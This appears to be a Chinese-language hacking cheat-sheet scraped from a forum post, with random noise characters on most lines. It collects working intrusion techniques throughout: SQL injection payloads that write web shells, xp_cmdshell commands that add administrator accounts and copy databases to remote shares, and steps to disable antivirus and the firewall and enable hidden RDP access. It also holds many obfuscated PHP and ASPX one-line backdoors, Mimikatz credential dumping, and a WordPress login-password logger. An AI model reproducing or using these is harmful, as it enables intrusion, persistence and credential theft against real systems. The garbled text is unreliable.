/ M  C+ G5 `8 w6 Y( |% T( d/ s7 {查询sql server 2005中的密码hash
- N1 C- f  R0 aSELECT password_hash FROM sys.sql_logins where name='sa'
, Y/ y  X9 s/ d" L. m! ySELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a% @4 G; {( d4 ]1 P
access中导出shell
* S; f* i" M) r" G! Q$ X
: I  r: F1 ]# b1 ^& `中文版本操作系统中针对mysql添加用户完整代码:
) X, L1 _# o" w$ p5 x/ K9 a  P9 {- _$ w, _: D% z# }+ W8 M
use test;
5 \# {+ W# |0 W& R3 j+ lcreate table a (cmd text);! u. H  v% S$ U" w
insert into a values ("set wshshell=createobject (""wscript.shell"") " );  u! h  y! D' o- _
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
0 ^4 f, S7 y* ^7 l: C' \insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );1 [9 T: `1 z( B2 {6 R& r
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
' J* Y# g! x* ]; ^  rdrop table a;
- ]& m! v! B2 C, \8 T7 _
6 N1 ~9 X" _  w% e. |英文版本:
& R8 G# z; n0 v4 V5 v( F. J
/ P* l4 ]% S8 m' zuse test;+ j; b5 Y7 L, X! y0 l* J8 l% u$ X" `
create table a (cmd text);! i: w% _+ D# O+ P2 u3 ?1 T
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
' [; A: K2 u' \: q/ z1 Uinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
" @& ]0 f, D. G- t) G6 ainsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );# d2 S: O5 R, l; q: T  P
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";+ [/ z+ R8 t" o3 }8 j: A
drop table a;) k: F5 C: [' z) H: p
2 v8 k4 t5 p& P1 |* P
create table a (cmd BLOB);
3 J6 Z7 H: b( [& m( xinsert into a values (CONVERT(木马的16进制代码,CHAR));
2 I1 `( r( M5 H% y$ r4 Z$ bselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
' H; u0 g. Y. O8 \% @# udrop table a;2 C% ^& f  z7 }: G: ~' j
. ], Q7 X: a7 d7 N9 k) E0 Q/ ^
记录一下怎么处理变态诺顿
3 s6 E& [( }; A% z- n8 H查看诺顿服务的路径6 X' A9 L0 ~/ i" O9 N  ?6 ~
sc qc ccSetMgr5 P- g# [# J( Q
然后设置权限拒绝访问。做绝一点。。  u. N( q( m0 |' A& _1 x- j
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
0 A, g! Z: c- ~. ]) S& H- Kcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
! Q- Q5 e, C  D3 ]& K, \cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators# C5 m& L2 t& `( Y7 t: X) a
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone( O6 _' R$ R2 u* T

+ o8 d% i$ N, [& s( `7 I( g/ r7 [1 j7 N然后再重启服务器2 m3 \% @+ K' Y7 K' r7 E* e
iisreset /reboot4 |9 c3 N3 i1 s  C4 q
这样就搞定了。。不过完事后。记得恢复权限。。。。
6 A% r3 v- e" e5 j$ R% c  I* b5 J5 ^cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
8 v1 ~  o: A+ ]; A/ ]& `cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F* Q/ g/ {, p( D& _8 Z
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
& X( k4 ^/ i) ]8 N6 J9 M( [cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F  z2 D2 @+ n6 b8 w: Z( E& d# i
SELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
+ f) q; U1 T/ P, |& M) g
3 @* m5 m% V! \- CEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')/ I' @1 A, O& o
1 s4 V7 ~1 {8 ~) S" h& q4 Q
postgresql注射的一些东西# q+ p$ I/ W. {
如何获得webshell
# ]. `( T4 o$ H* shttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
5 Q% S9 W2 G% O4 ghttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
( g7 Y+ @" B7 s2 @5 J2 shttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
  R7 c  f0 F3 I如何读文件+ N" L: Y  T# P) a6 o5 d
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);) m1 u1 p7 ~$ i$ N9 f) g
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
, G+ l9 Z/ {% m/ c% {: m, C# m% Phttp://127.0.0.1/postgresql.php?id=1;select * from myfile;
; _& L0 R0 I/ h# L4 [9 V8 p( a6 `( Y( T! h
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。5 J4 l6 W0 s& r& z, l& ]; e
当然,这些的postgresql的数据库版本必须大于8.X0 H' W  g4 O# O! B/ Z& F1 ]6 ^
创建一个system的函数:
# w0 r9 ^$ H' Y  [; Q2 r% `* ^CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
3 O% B+ b+ E+ V, c
7 u( [% c  X9 ]. p6 _1 B创建一个输出表:
( L/ D$ r1 j  v# A( x8 x+ UCREATE TABLE stdout(id serial, system_out text)
8 `9 [. I4 O) z& b. G/ e& N( f9 \) G3 R8 r. N
执行shell,输出到输出表内:
! f) K+ |( C# }, MSELECT system('uname -a > /tmp/test'); ]& g$ i: K& m) n$ q; |

2 R& B! Z9 L% N- t  Xcopy 输出的内容到表里面;# f! g% G8 h. ~* M) Z! U- |
COPY stdout(system_out) FROM '/tmp/test'0 b7 }; m% a9 v; W* J  w: ]
6 U$ ^9 H, Y' C% Y. Y
从输出表内读取执行后的回显,判断是否执行成功
% ^  F1 P2 j% N" Q  ?
: j, g* k$ z. l# oSELECT system_out FROM stdout& g" c$ q  t& \+ h% M$ j
下面是测试例子+ |4 F. m1 p0 f: U" h
% W( P" Y7 N" }$ m0 `, ~% m
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
. s5 n  {  z) L" v( J; x' O4 \3 |! n+ v2 x
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C': v( u" D5 U' P! q/ F
STRICT --6 p' ~! F7 v2 H6 I+ g' ]
/ b* J9 ]1 D8 B* J) n8 ~' W
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
1 h: i: C+ H) d8 D4 ~
& g9 u9 {- k1 g% D2 P4 k" ?$ L, o/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
. o5 C! G* g, p& W& p! f: p6 N9 _& E% n0 V
# M4 u7 }$ O) Z' T5 W" N  Y. K" b0 y/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--3 M8 z+ v. \6 _$ b7 b: J' O: N2 L
net stop sharedaccess    stop the default firewall% L" K+ Z* {. t
netsh firewall show      show/config default firewall
8 Q' h" X. O8 w% q2 @netsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall
/ k! X+ W  Z) T8 @4 ^netsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall5 @8 z5 z+ R. ~/ r
修改3389端口方法(修改后不易被扫出)  t' \3 y- \. O' N: O: }# e% B& N; e
修改服务器端的端口设置,注册表有2个地方需要修改
; K0 f) M& i$ e" s
8 q( Q( _1 S6 m, {) {% N3 ?[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]' l- ^- I* O$ K; h( {/ u
PortNumber值,默认是3389,修改成所希望的端口,比如6000
# w0 M6 H, e4 I8 c
; l, C, ^% ^) b/ v第二个地方:
" ^) @# t. w4 ], J; r[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 3 c; _. e) F: {  ]/ E' G0 D1 ~/ W) ^
PortNumber值,默认是3389,修改成所希望的端口,比如60000 m* g- |" q, k$ v# t$ A( g

% z3 N' q7 W5 z现在这样就可以了。重启系统就可以了
# Q6 H0 T) L* z! k+ X. C; B/ J, \7 d  f. y  O
查看3389远程登录的脚本
& C, }; H/ N) N6 d# N4 J保存为一个bat文件
# T! U( N) n% S, S! Cdate /t >>D:\sec\TSlog\ts.log
5 Y- f+ ?4 \' Qtime /t >>D:\sec\TSlog\ts.log# r) }4 ]) b8 E$ B4 \2 L1 y+ G- Z$ r
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
1 o4 N. H- R. Z7 dstart Explorer
8 c( j+ r/ p3 V5 m# B
7 a( ~4 D3 T8 o* g; s0 D* Xmstsc的参数:8 L! O/ a( A& D  o. W$ J
+ O: k5 R3 g" E$ k; }% R
远程桌面连接
7 x" ?% T8 H4 z7 p. Q0 n
2 P3 g  ?1 K2 t9 pMSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
) ~3 V  M% S; @0 f: e9 D  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?) {5 p- |( X* b5 S" P/ [

% ?! Q' ~2 [* \# l' ]$ e, {- P9 w<Connection File> -- 指定连接的 .rdp 文件的名称。0 q* {0 O3 e- T) ?! ]( p

( e# a- |; H* V8 ]/v:<server[:port]> -- 指定要连接到的终端服务器。
/ o* m  i  n+ s1 H# p/ u
+ o, X: X6 @. {6 w/console -- 连接到服务器的控制台会话。
/ w# O7 ?( x8 c4 o7 \6 N! i! l) A! d7 ~1 G: X" I
/f -- 以全屏模式启动客户端。
% O* C" s  H" z, b
* X6 w, c" d  Z0 D( D* d/w:<width> --  指定远程桌面屏幕的宽度。
1 o- z, D( f; r! v( W, r- I) Y4 f
% R- c: y7 y; d& Q/h:<height> -- 指定远程桌面屏幕的高度。
3 ~  ?# H3 H0 Z. u  j
2 y2 F/ \! C' [% w6 N; ~* F/edit -- 打开指定的 .rdp 文件来编辑。
; T! u6 I! E: e; @4 V( _* E
& A! r/ L. W+ z9 S. F  {/migrate -- 将客户端连接管理器创建的旧版: ~$ I/ z2 a% r9 F  s+ W
连接文件迁移到新的 .rdp 连接文件。. l; h* T+ s8 d; X( k
( u4 F8 Y7 E1 s9 |$ i' L; p
1 s& l6 P1 [# d) n5 z1 M. t% R
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就1 `. q+ b: i9 X
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
0 R4 S8 }) R- |5 h4 a( v4 J  R& f$ I% S- X+ F" C; g2 u' A4 X
命令行下开启3389% \/ x' T" k) }
net user asp.net aspnet /add
1 Y' {$ N1 T: J$ v6 s% wnet localgroup Administrators asp.net /add
4 m- |; a) k! n6 V% Unet localgroup "Remote Desktop Users" asp.net /add3 T8 l% q1 j3 p' k5 y
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
8 I+ V6 Y. N/ A+ h/ H) Y* e$ X( N; lecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0; \6 m  `; t: N1 i3 G$ ?: P- G; Q: V
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 13 f, [8 F7 s8 q) `" J1 m* y9 O
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f- Y" L6 r$ D0 G: F) Z1 J, d0 a
sc config rasman start= auto" A( M+ {; T  b  N
sc config remoteaccess start= auto
* Q+ [2 ^8 C& F- Tnet start rasman
' {- {' b5 e% @( S" U- [  Knet start remoteaccess( R, p4 c& J& N8 p3 H" G* o' h
Media$ E* u4 f  H: {$ x( |5 ]: R) y
<form id="frmUpload" enctype="multipart/form-data"
$ H% U7 v: I" W1 k2 K. N% s$ `action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>) O; x7 E" h( R$ x3 `0 t: n0 W
<input type="file" name="NewFile" size="50"><br>+ B' X% K3 f+ y. k! F/ e
<input id="btnUpload" type="submit" value="Upload">
0 ~2 J; q" a8 M1 x. d/ |$ V% l: w# h</form>
$ c- m. z* N  I3 ~2 a
' H' Y, S2 M$ N2 _8 g( |) T) F& S3 Tcontrol userpasswords2 查看用户的密码
% R& |) x: S  m) ]access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径5 i# j/ H) D. N0 }
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
' E' K) K! h; T' ]4 v" {& z: Z0 q7 L0 ?
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
7 N: Q& s1 n! }5 l8 J9 {: K8 b6 i测试1:  ^# _& p  _" h! `% l
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1$ y( W. ^" c4 K. ^, O

  g0 G2 D  r- I( r4 K3 G/ L; b测试2:
! G, T' T; b# d8 H9 ]
: _* x9 e8 o) C: i  Y3 rcreate table dirs(paths varchar(100),paths1 varchar(100), id int)2 F* c; O; z: H3 @0 r" c

5 ?' `$ V/ x3 J  V2 pdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--2 ?" d/ h+ S& z9 R5 U) `3 k- u

/ Q+ f+ W3 c' pSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1* y, D+ P& O! m2 E6 ^( K
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令% _) Y% o: B9 a, O$ k1 o
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;8 |$ O& @; X8 j5 V, S
net stop mcafeeframework+ d6 X0 F* X# K* G1 T/ E4 A6 w4 F8 c
net stop mcshield
& o/ v6 c( i4 fnet stop mcafeeengineservice7 T# ~6 D1 f2 ^5 c- r4 D
net stop mctaskmanager
: s* @% c* s" s8 w; W" _/ a1 khttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
$ X; D) g. P1 D
* n& q% @/ o3 k: ^  VNCDump.zip (4.76 KB, 下载次数: 1) ; S4 B5 b. J! V' i
密码在线破解http://tools88.com/safe/vnc.php
* h, z! ^0 A1 w  d% l+ F( }VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取, e! e0 `! {) \" L) ?2 S+ S' A

3 I3 c  N; j# B2 L: texec master..xp_cmdshell 'net user'
5 g8 u- F9 p* g3 j; Q9 lmssql执行命令。, N$ D1 o* |" U, ]
获取mssql的密码hash查询% ?* Q" f$ ^2 }( Y" t
select name,password from master.dbo.sysxlogins
* `( C( e" ~! R  [& s
9 D1 o1 r# I4 \- G1 b) [backup log dbName with NO_LOG;# A" P9 k0 J, g4 }- ^
backup log dbName with TRUNCATE_ONLY;3 i  G1 e8 P9 y; J
DBCC SHRINKDATABASE(dbName);! Y: ]  M% L" H; \
mssql数据库压缩; W; \6 x  _( a% x( }5 y5 d1 v
* b/ `9 U; }9 a# L5 j$ c+ e
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
5 E. i" s4 d  X" l/ i2 G将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
" d, R2 v8 s4 ?0 `+ [( M$ @9 w4 k! X# c3 `9 K
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'; v2 y  S. v$ P; k8 P* h7 x8 O
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
/ ~; d8 g( J! F: `0 i" H* `0 ]: J) d0 a, q- Q  U
Discuz!nt35渗透要点:
) d' P/ J8 b5 Q; R6 o/ A(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
8 b. ~( D$ ]- f- Y" o3 v9 i(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
, Q7 F* ~( x9 N: L(3)保存。) N) z) r# [4 ?; h3 q7 s5 _! C
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
* o+ E( a8 t' A$ Kd:\rar.exe a -r d:\1.rar d:\website\1 H6 y& Z+ e/ U% l; o8 K
递归压缩website
% V4 q5 \. @6 H注意rar.exe的路径
. p9 H( p7 h) G3 ^  t( L1 F" n1 a: M- Q3 r( J
<?php. F0 p7 ?6 I% H" D& W. d) T( |

! I0 j7 Z4 a9 m' D- R9 B7 w( l$telok   = "0${@eval($_POST[xxoo])}";' N( b+ D0 g' ]. D
; K( J( Z1 ]7 g- g; Y$ p! _) m
$username   = "123456";
; G; C- _* N$ b, F9 e5 P+ B4 A  u; r: a3 ^, I+ b2 ^
$userpwd   = "123456";2 T( S3 [) y  ^; Z8 I

' Y9 T; m! K" `  X8 E' ?$ Y! M$telhao   = "123456";9 B/ k. d$ V, v3 S/ E
' V7 C/ X1 \1 E3 N
$telinfo   = "123456";
/ U3 @6 |9 ?. K' x) j! k" O" I; n# D% G! J/ [, R& D& ~- o
?>
8 Y1 n9 @- ~. C& k6 k2 o; sphp一句话未过滤插入一句话木马
4 ?( Z. \. s8 b+ v
. e3 ^$ |+ _3 o  y, T站库分离脱裤技巧
) j  \4 J9 P* T5 bexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"': B% q. a  u: w; @
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'# K% y0 ^# a* Y+ a( ^8 N9 U
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
! X# D+ X: a3 o% @3 F这儿利用的是马儿的专家模式(自己写代码)。# n  `; ]' v3 i" ]# Y4 L
ini_set('display_errors', 1);
/ D* c5 ]' C3 Iset_time_limit(0);3 t3 Q6 n% e+ Y0 U, t3 d0 d( h8 I
error_reporting(E_ALL);
- I  A$ d/ `2 }$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
" x: a; U1 h1 n* G; [" c" \mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());. o$ [5 d  D% s& R4 r1 ]1 b
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
9 Y) x  N0 P9 q) w9 [% x$i = 0;
+ D9 v0 |  g- C7 I5 E! F$tmp = '';
# A/ l2 d% I$ f7 Z$ s; Awhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {: b, h4 g4 [: X; V# L
    $i = $i+1;5 g  W3 Q  a) D4 e
    $tmp .=  implode("::", $row)."\n";6 l! ^$ f" A) D* j% T, B- L& Y
    if(!($i%500)){//500条写入一个文件
: M! J" y! y) h% b( u& U5 w5 Z        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';' L$ G# N6 I1 G6 T- s/ j6 o
        file_put_contents($filename,$tmp);
! n2 k- J+ z9 p. {        $tmp = '';
. p8 m9 j% e& j5 J" K& m    }9 i6 B3 b, u0 i8 [
}. ~' H/ `6 S, |
mysql_free_result($result);
( x. A: g7 V. x8 j5 @
; u" W2 x( T/ o; o' [! j' d: H$ r& T9 {8 y4 ?. o- _# b) @. f
! {3 p5 b- r! @
//down完后delete8 V/ `# j. O+ c6 R. R! f1 I! b$ u& R% Z
6 X' v3 e. R5 z0 J. [9 e+ ]
6 i! K0 j8 |) Q* O" q7 w
ini_set('display_errors', 1);
/ ]6 f1 H& M. b8 s$ f5 J9 |9 _error_reporting(E_ALL);
- |7 T/ X7 b. d2 v7 W$i = 0;
* G& j$ q1 m" H9 ~3 J& \while($i<32) {8 l4 s- ~0 o3 A' H
    $i = $i+1;
; l, |  a& e( X4 w% L" a( N        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';9 R& @2 p( q9 D: c$ C0 P' C" V
        unlink($filename);& s5 M7 B$ d. K4 A; O
} ( ~- g8 ^+ _9 z, c9 Y0 e+ J0 j
httprint 收集操作系统指纹/ r* z. p/ ^" g' m( I  x, G& @
扫描192.168.1.100的所有端口9 J6 o4 \0 k3 Z( D  Q4 E) Q
nmap –PN –sT –sV –p0-65535 192.168.1.100- y# A2 H+ H! h
host -t ns www.owasp.org 识别的名称服务器,获取dns信息# L/ k+ ?2 W( e- @% ^
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
( m$ m% G6 G" j; |7 t, fNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
8 R" h: B5 Q; }& s/ _3 {6 H  |
: s+ P. }1 @; [! d4 FDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)7 m' d0 g4 e8 j* d' @# k( B

& a1 E. `  T) R' E/ L$ h  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)( H/ l' V; b9 A  c" V
+ k& k3 _' @2 z3 d. R0 K/ d
  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x8 h$ I9 `( }: V8 m
6 {2 n; ]/ g6 X1 Q, ~+ S$ q
  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
8 h8 _% `' F  _$ Y! S& u, i# i: o$ v" u4 \2 ?
  http://net-square.com/msnpawn/index.shtml (要求安装)
- N& h- P) z3 J4 f" a7 z, D, ?: z; {* P' d- [4 |  X- q/ L
  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)- P  q9 S* P2 @) ?
7 V2 I8 s( O" W) D3 n  f  l
  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
6 F' V% c, M3 E5 T$ |set names gb2312% `1 g8 H; A/ l  u  a
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。# u4 I/ `/ K  g* m) n

$ V0 I  _; L+ P. D- R8 omysql 密码修改
" C+ m# `/ h: J. w: _UPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ”
6 W3 M) G# @) v/ Y- X* Aupdate user set password=PASSWORD('antian365.com') where user='root';
& b1 x4 c$ T6 t. ]+ dflush privileges;) Z0 Q. H3 W3 Y4 K0 ~' Z
高级的PHP一句话木马后门9 h2 N! S" d' T' K

9 o: M' F3 _- _) j+ Q# P3 V# K/ J入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀3 _0 U2 B9 ?" B3 v0 n: @6 N- U+ ~

* J- j$ y/ {4 t1、3 u% L8 K+ w* [5 J' f0 z( a! ?7 {
4 d2 H! l) z8 b9 b( z* z) [
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";: b+ Q* W; _: t% ~8 O8 h
6 C6 U) w1 y0 }
$hh("/[discuz]/e",$_POST['h'],"Access");7 l0 {2 z6 x! R3 X4 U6 y8 Z

9 j7 h* E- k% [5 }; ~, N1 `: v; p4 q//菜刀一句话. V, R% p1 q4 k

1 F3 v+ R5 y( N6 Z2、
" |, L; \6 N) c. t
0 \. k- X5 Q+ {. U+ k$filename=$_GET['xbid'];
" i; |, y0 _3 Z' L  c9 h  e( \' c3 s" e% b# o- m, h
include ($filename);
4 o  ~% }2 _" M( d( [# t/ K* O& f& Y# z/ N; i
//危险的include函数,直接编译任何文件为php格式运行+ f) j( D, x$ @
1 P1 G" |1 I/ o  ?0 x" G  i. X
3、
  \5 ~& m+ _* F/ b( v6 @) r# k- ^3 ~& d" _" k
$reg="c"."o"."p"."y";5 T8 D0 x- E, u3 B3 x8 X+ @
+ j2 E7 z- I7 E: t
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
2 h! I% {3 m% f* f) h/ K$ X3 A: A2 t! U9 G
//重命名任何文件
. Y9 W* m9 y0 s+ \- B  x) _# Y1 l" G' e# {6 n# J0 J0 |
4、1 M0 A) u: M/ y- L
7 }7 N) `7 }* U9 d) l6 S( p
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
0 n' X* o, e7 J1 ]) i$ H  R. l7 [" n' `& s; t) t
$gzid("/[discuz]/e",$_POST['h'],"Access");
$ f8 ~+ X' u  [9 @1 X' N1 \9 U9 _& |! _: Z- ^: q
//菜刀一句话
5 L2 s$ o* @6 D9 G) _: F6 g
5 j. J5 h0 s6 a# M8 O) T0 |* ~5、include ($uid);/ ^) S) o/ D- \9 w

1 H; c! t4 H3 i- M//危险的include函数,直接编译任何文件为php格式运行,POST # y1 ^) l% }0 u4 O) L" b
3 |% H: a, G. r* [* F# T
- U! F9 }2 {9 f8 d. @. F& Q' H: h
//gif插一句话
1 J% _7 h- A$ T; r- j3 [- m7 O+ o# y! Q- e9 F9 t
6、典型一句话6 F" `2 d# @9 ^5 t  e4 h

4 U& y- i% P) H5 V" s$ r9 O0 E程序后门代码% d0 ]8 G/ G1 A" U/ a
<?php eval_r($_POST[sb])?>$ y" V" P, M3 C( D
程序代码
4 q5 {1 n% ], W2 ^; }/ L  o. B<?php @eval_r($_POST[sb])?>! `4 h3 P7 f( B& K3 {3 ?
//容错代码" K) w3 R+ H- G5 z  J. a
程序代码* T: u* T/ Q  b: j% R
<?php assert($_POST[sb]);?>. u+ Q: u- n: P' z# P- n
//使用lanker一句话客户端的专家模式执行相关的php语句
+ X: w+ h" t3 h  q3 d: z( ?% a1 O# ~程序代码
! C, }( H6 U1 b/ R0 g<?$_POST['sa']($_POST['sb']);?>" ^4 a% V  P% @$ H" l5 q$ p) ^2 V" F
程序代码
, X8 T# N& l$ K$ h8 T, V. `! F<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
3 N8 ^# H* m9 c: Z' d2 F程序代码
/ M" m6 X8 X- W& F<?php
/ f6 }+ t1 i* t6 a, A5 }( C@preg_replace("/[email]/e",$_POST['h'],"error");
3 q3 f: }) l; x* d  P$ C- e?>  z- u. x) v9 T
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
5 q+ K  v" h- l4 ?程序代码
' c& |0 Z4 k" _6 ^<O>h=@eval_r($_POST[c]);</O>/ A# B( h4 b& Z3 }$ [. p
程序代码2 `" U  o1 Y% v4 t/ t/ c" P& ^
<script language="php">@eval_r($_POST[sb])</script>
. v8 B* a: j2 d6 a7 ~" [: `//绕过<?限制的一句话- p: V, _* g( `7 m4 p6 n
+ Q/ ~6 E& h  _1 G6 q; g
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip- S! v; I7 Z: B) q
详细用法:
( h. U: r6 x4 X1、到tools目录。psexec \\127.0.0.1 cmd/ L5 R% \' g, q
2、执行mimikatz; H- t9 E! P9 G9 q; P
3、执行 privilege::debug
% w: W. K+ X$ @) _( m4、执行 inject::process lsass.exe sekurlsa.dll$ U. z% S! y. E( m/ b3 {( [/ K# m
5、执行@getLogonPasswords
" {1 ]* Y( e# x& \5 ~8 a! \- Q9 U! U6、widget就是密码
- j: b! f) ^& s: j$ I7、exit退出,不要直接关闭否则系统会崩溃。" h/ l! ]$ [0 s
, z1 @" `% B4 l; k+ L2 w, ^: W
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
$ P' f* x' K; ~) L  A+ w
8 p# a; J5 k- b" ]自动查找系统高危补丁
5 U: T7 Y3 L: B0 T$ w) R' ^systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt/ t" k7 P& }) m3 V3 E# n2 l9 l
' }% @$ z5 ?" y
突破安全狗的一句话aspx后门* o. x) Z2 q$ L* K! _
<%@ Page Language="C#" ValidateRequest="false" %>6 \! I' o9 M5 d9 c
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
3 N0 _- G- s8 Q7 p/ G* V' hwebshell下记录WordPress登陆密码0 v& n  @6 z/ R1 Y" j. G' [
webshell下记录Wordpress登陆密码方便进一步社工
$ F9 D5 e! L" E- h5 n3 S1 t在文件wp-login.php中539行处添加:6 v  s: Y. X5 a* Q
// log password. |3 p+ o4 D- S. y5 u3 Q6 J, t/ R
$log_user=$_POST['log'];
. q) P" l: Y" \2 U% Z( S; Y$log_pwd=$_POST['pwd'];
